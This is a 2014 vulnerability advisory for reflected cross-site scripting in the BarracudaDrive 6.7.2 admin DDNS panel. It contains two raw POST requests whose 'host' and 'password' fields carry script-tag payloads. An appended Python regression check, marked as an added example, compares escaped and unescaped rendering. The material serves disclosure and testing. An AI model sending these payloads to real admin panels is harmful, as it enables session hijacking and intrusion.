###############################################################################
#Exploit Title : BarracudaDrive 6.7.2 Administrator Panel Reflected Cross-Site Scripting
#Author : Govind Singh aka NullCool
#Vendor : http://barracudadrive.com
#Software : BarracudaDrive 6.7.2
#Date : 15/06/2014
#Discovered At : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to : error1046, DeadMan India, CyberGladiator, Amit Kumar Achina
################################################################################
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--=={ >:)o Overview of vulnerability o(:< }==--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
BarracudaDrive: Multiple Reflected Cross-Site Scripting in the DDNS panel
The BarracudaDrive administrator panel contains reflected cross-site scripting vulnerabilities: user input is not properly checked before it is returned in the response.
1) The "host" parameter to "/rtl/protected/admin/ddns/" is not properly verified before it is returned to the user. This can be exploited to execute arbitrary script code.
2) The "password" parameter to "/rtl/protected/admin/ddns/" is not properly verified before it is returned to the user. This can be exploited to execute arbitrary script code.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--=={ >:)o Proof of Concept: o(:< }==--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1).
Host=localhost:9357
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost:9357/rtl/protected/admin/ddns/
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=81
POSTDATA=provider=DNSdynamic&host="><script>alert(123);</script>&username=%3E&password=%3E
PoC image : http://prntscr.com/3sym87
2).
Host=localhost:9357
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost:9357/rtl/protected/admin/ddns/
Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=78
POSTDATA=provider=DNSdynamic&host=&username=%3E&password="><script>alert('Govind Singh');</script>
PoC image : http://prntscr.com/3symgz
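Added example (not part of the original advisory and not BarracudaDrive code): a regression check that feeds the two POSTDATA bodies above through a hypothetical form renderer, once with raw concatenation and once with attribute encoding, and confirms with an HTML parser whether a script element appears. The FORM markup and all function names are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# Sample bodies copied from the two POSTDATA lines in the PoC above.
POC_BODIES = (
    'provider=DNSdynamic&host="><script>alert(123);</script>&username=%3E&password=%3E',
    "provider=DNSdynamic&host=&username=%3E&password=\"><script>alert('Govind Singh');</script>",
)

# Hypothetical form markup; the real DDNS page template is not shown in the advisory.
FORM = ('<input type="text" name="host" value="{host}">'
        '<input type="password" name="password" value="{password}">')

def parse_form(body):
    """Split an x-www-form-urlencoded body into a dict of decoded fields."""
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields

def render_unsafe(fields):
    """Before: request values are concatenated into attribute context as-is."""
    return FORM.format(host=fields.get("host", ""), password=fields.get("password", ""))

def render_safe(fields):
    """After: host is HTML-attribute-encoded; the password is never echoed back."""
    return FORM.format(host=html.escape(fields.get("host", ""), quote=True), password="")

class _Tags(HTMLParser):
    """Collects the name of every start tag the parser encounters."""
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(markup):
    """Return the start tags an HTML parser sees in the rendered markup."""
    parser = _Tags()
    parser.feed(markup)
    parser.close()
    return parser.tags

if __name__ == "__main__":
    for body in POC_BODIES:
        fields = parse_form(body)
        print(tags_in(render_unsafe(fields)), tags_in(render_safe(fields)))
```

Checking the parsed tag list rather than searching for a substring keeps the test valid for any payload that closes the attribute, not only the two shown here.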
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.